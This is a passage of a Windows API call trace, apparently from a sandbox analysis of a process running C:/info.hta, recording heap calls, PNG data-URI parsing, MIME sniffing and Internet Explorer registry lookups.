pszString="iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", cchString=0x5b0, dwFlags=0x1, pbBinary=0x60b690, pcbBinary=0x1ecf14, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x60b690, pcbBinary=0x1ecf14, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0227.745] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x605558 [0227.745] GetProcessHeap () returned 0x590000 [0227.745] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x443) returned 0x60bb28 [0227.745] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x60b690 | out: hHeap=0x590000) returned 1 [0227.745] lstrlenW (lpString="") returned 0 [0227.745] lstrlenW (lpString="image/png") returned 9 [0227.745] lstrlenW (lpString="") returned 0 [0227.745] StrCmpNICW (lpStr1="image/pn", lpStr2="text/css", nChar=8) returned -11 [0227.745] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x443) returned 0x60b690 [0227.745] lstrlenW (lpString="image/png") returned 9 [0227.746] FindMimeFromData (in: pBC=0x0, pwzUrl=0x0, pBuffer=0x60b690, cbSize=0x443, pwzMimeProposed="image/png", dwMimeFlags=0x2, ppwzMimeOut=0x60b4d0, dwReserved=0x0 | out: ppwzMimeOut=0x60b4d0*="image/x-png") returned 0x0 [0227.746] StrCmpICW (pszStr1="image/x-png", pszStr2="text/xml") returned -11 [0227.746] StrCmpNICW (lpStr1="image/x-", lpStr2="text/css", nChar=8) returned -11 [0227.746] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x60b690 | out: hHeap=0x590000) returned 1 [0227.746] IUnknown:Release (This=0x5bd34c) returned 0x9 [0227.746] IUnknown:Release (This=0x5bd34c) returned 0x8 [0227.746] IUnknown:Release (This=0x5bd34c) returned 0x7 [0227.746] CoTaskMemFree (pv=0x0) [0227.746] GetCurrentThreadId () returned 0x36c [0227.746] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xb92) returned 0x60bf78 [0227.746] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x606100 [0227.747] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4a8) returned 0x60cb18 [0227.747] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x98) returned 0x5eaa38 [0227.747] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x258 [0227.747] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7406e718, lpParameter=0x5eaa38, dwCreationFlags=0x0, lpThreadId=0x5eaa4c | out: lpThreadId=0x5eaa4c*=0x498) returned 0x25c [0227.763] GetCurrentThreadId () returned 0x36c [0227.763] SetEvent (hEvent=0x258) returned 1 [0227.764] IUnknown:Release (This=0x5bd34c) returned 0x6 [0227.764] IUnknown:Release (This=0x5bd34c) returned 0x5 [0227.764] IUnknown:AddRef (This=0x5bd34c) returned 0x6 [0227.764] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed34c | out: phkResult=0x1ed34c*=0x260) returned 0x0 [0227.764] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed350 | out: phkResult=0x1ed350*=0x264) returned 0x0 [0227.764] RegOpenKeyExW (in: hKey=0x264, lpSubKey="FEATURE_BLOCK_LMZ_IMG", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed30c | out: phkResult=0x1ed30c*=0x0) returned 0x2 [0227.764] RegOpenKeyExW (in: hKey=0x260, lpSubKey="FEATURE_BLOCK_LMZ_IMG", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed30c | out: phkResult=0x1ed30c*=0x268) returned 0x0 [0227.764] SHRegGetValueW () returned 0x2 [0227.764] SHRegGetValueW () returned 0x2 [0227.764] RegCloseKey (hKey=0x268) returned 0x0 [0227.764] RegCloseKey (hKey=0x0) returned 0x6 [0227.764] RegCloseKey (hKey=0x0) returned 0x6 [0227.764] RegCloseKey (hKey=0x260) returned 0x0 [0227.764] RegCloseKey (hKey=0x264) returned 0x0 [0227.764] IUnknown:Release (This=0x5bd34c) returned 0x5 [0228.271] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", ppu=0x1ed3f0 | out: ppu=0x1ed3f0) returned 0x0 [0228.271] CreateUri (in: pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x1ed3f0 | out: ppURI=0x1ed3f0*=0x5bd424) returned 0x0 [0228.271] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ed280 | out: ppu=0x1ed280) returned 0x0 [0228.271] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x1ed33c | out: ppURI=0x1ed33c*=0x5bbf0c) returned 0x0 [0228.271] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed304 | out: ppvObject=0x1ed304*=0x5bbf0c) returned 0x0 [0228.271] IUnknown:Release (This=0x5bbf0c) returned 0xd [0228.271] IUnknown:AddRef (This=0x5bbf0c) returned 0xe [0228.271] CoInternetCombineIUri (in: pBaseUri=0x5bbf0c, pRelativeUri=0x5bd424, dwCombineFlags=0x6000000, ppCombinedUri=0x1ed370, dwReserved=0x0 | out: ppCombinedUri=0x1ed370*=0x5bd424) returned 0x0 [0228.271] IUnknown:Release (This=0x5bbf0c) returned 0xd [0228.271] IUnknown:Release (This=0x5bbf0c) returned 0xc [0228.271] IUnknown:QueryInterface (in: This=0x5bd424, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed2c4 | out: ppvObject=0x1ed2c4*=0x5bd424) returned 0x0 [0228.271] IUnknown:Release (This=0x5bd424) returned 0x3 [0228.271] IUnknown:AddRef (This=0x5bd424) returned 0x4 [0228.271] IUri:GetAbsoluteUri (in: This=0x5bd424, pbstrAbsoluteUri=0x1ed2b8 | out: pbstrAbsoluteUri=0x1ed2b8*="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==") returned 0x0 [0228.271] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xf4) returned 0x610240 [0228.272] IUnknown:AddRef (This=0x5bd424) returned 0x5 [0228.272] IUnknown:QueryInterface (in: This=0x5bd424, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed28c | out: ppvObject=0x1ed28c*=0x5bd424) returned 0x0 [0228.272] IUnknown:Release (This=0x5bd424) returned 0x5 [0228.272] IUnknown:AddRef (This=0x5bd424) returned 0x6 [0228.272] IUri:GetScheme (in: This=0x5bd424, pdwScheme=0x1ed2d8 | out: pdwScheme=0x1ed2d8*=0x0) returned 0x0 [0228.272] IUnknown:Release (This=0x5bd424) returned 0x5 [0228.272] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5fc690 [0228.272] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x5dd728 [0228.272] IInternetSecurityManager:MapUrlToZone (in: This=0x5c2540, pwszUrl="file:///C:/info.hta", pdwZone=0x1ed2d0, dwFlags=0x0 | out: pdwZone=0x1ed2d0*=0x0) returned 0x0 [0228.272] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1b0) returned 0x610340 [0228.272] IUnknown:QueryInterface (in: This=0x5bd424, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ecfcc | out: ppvObject=0x1ecfcc*=0x5bd424) returned 0x0 [0228.272] IUnknown:Release (This=0x5bd424) returned 0x5 [0228.272] IUnknown:AddRef (This=0x5bd424) returned 0x6 [0228.272] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", ppu=0x1ecf90 | out: ppu=0x1ecf90) returned 0x0 [0228.272] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0228.272] IUnknown:AddRef (This=0x5bd424) returned 0x7 [0228.273] IUnknown:AddRef (This=0x5bd424) returned 0x8 [0228.273] IUnknown:QueryInterface (in: This=0x5bd424, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ecfc0 | out: ppvObject=0x1ecfc0*=0x5bd424) returned 0x0 [0228.273] IUnknown:Release (This=0x5bd424) returned 0x8 [0228.273] IUnknown:AddRef (This=0x5bd424) returned 0x9 [0228.273] IUri:GetScheme (in: This=0x5bd424, pdwScheme=0x610448 | out: pdwScheme=0x610448*=0x0) returned 0x0 [0228.273] IUri:GetSchemeName (in: This=0x5bd424, pbstrSchemeName=0x1ecfc0 | out: pbstrSchemeName=0x1ecfc0*="data") returned 0x0 [0228.273] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0228.273] IUnknown:QueryInterface (in: This=0x5bd424, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ecfcc | out: ppvObject=0x1ecfcc*=0x5bd424) returned 0x0 [0228.273] IUnknown:Release (This=0x5bd424) returned 0x9 [0228.273] IUnknown:AddRef (This=0x5bd424) returned 0xa [0228.273] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x606268 [0228.273] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1bc) returned 0x6104f8 [0228.273] CreateUri (in: pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x1ecf3c | out: ppURI=0x1ecf3c*=0x5bd424) returned 0x0 [0228.273] IUri:GetSchemeName (in: This=0x5bd424, pbstrSchemeName=0x1ecf1c | out: pbstrSchemeName=0x1ecf1c*="data") returned 0x0 [0228.273] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0228.273] IUri:GetPathAndQuery (in: This=0x5bd424, pbstrPathAndQuery=0x1ecf48 | out: pbstrPathAndQuery=0x1ecf48*="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==") returned 0x0 [0228.273] IUnknown:Release (This=0x5bd424) returned 0xa [0228.273] SysStringLen (param_1="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+N